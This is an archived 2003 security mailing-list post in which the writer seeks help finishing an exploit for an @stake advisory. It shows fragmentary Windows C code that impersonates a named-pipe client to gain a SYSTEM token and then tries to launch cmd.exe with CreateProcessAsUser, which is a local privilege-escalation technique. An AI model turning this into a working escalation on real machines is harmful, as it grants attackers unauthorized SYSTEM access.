Named Pipe Impersonation -> CreateProcessAsUser();

From: wirepair (
Date: 07/14/03

  • Next message: Blue Boar: "Re: Named Pipe Impersonation -> CreateProcessAsUser();"
    Date: Mon, 14 Jul 2003 12:45:37 -0700

    Hello, I'm attempting to finish up my exploit for the
    @stake advisory, i've hit quite a snag when i found out
    that calling a new process does not inherit the privileges
    of the named pipe. (I must have been thinking of fork() or
    something heh). So I can impersonate SYSTEM, but I can not
    create a new process with these nice privileges. Here is
    where i am at:
    ConnectNamedPipe() <-- yada yada wait for connection
       if (!ImpersonateNamedPipeClient (hPipe)) // impersonate
    the pipe so we now are SYSTEM.
         printf ("Failed to impersonate the named pipe.\n");
         return 5;
    // found this on msdn, i'm trying to get a token with full
    access, then call CreateProcessAsUser();
       if (!OpenThreadToken(GetCurrentThread(),
    TOKEN_ALL_ACCESS, TRUE, &hToken )) {
                 if (hToken != INVALID_HANDLE_VALUE) {
                             printf("damn: %u\n", GetLastError());

      MapGenericMask( &dwAccessDesired, pGeneric ); //this i'm
    kinda shady on, looks like i'm just mapping the id to the
    SYSTEM name? when i call GetUserName i get garble after
    the OpenThreadToken unless i call MapGenericMask...

    CreateProcessAsUser(hToken, "cmd.exe",
    NULL,NULL,NULL,true,NULL,NULL,NULL,&si, &pi);

    now i call createprocessasuser, using the token from
    openthreadtoken. In the debugger, it tries to execute cmd,
    but but i get nothing back... if anyone wants to see my
    code it's at Thanks
    this is starting to bug me :),
    For the best comics, toys, movies, and more,
    please visit <>

  • Next message: Blue Boar: "Re: Named Pipe Impersonation -> CreateProcessAsUser();"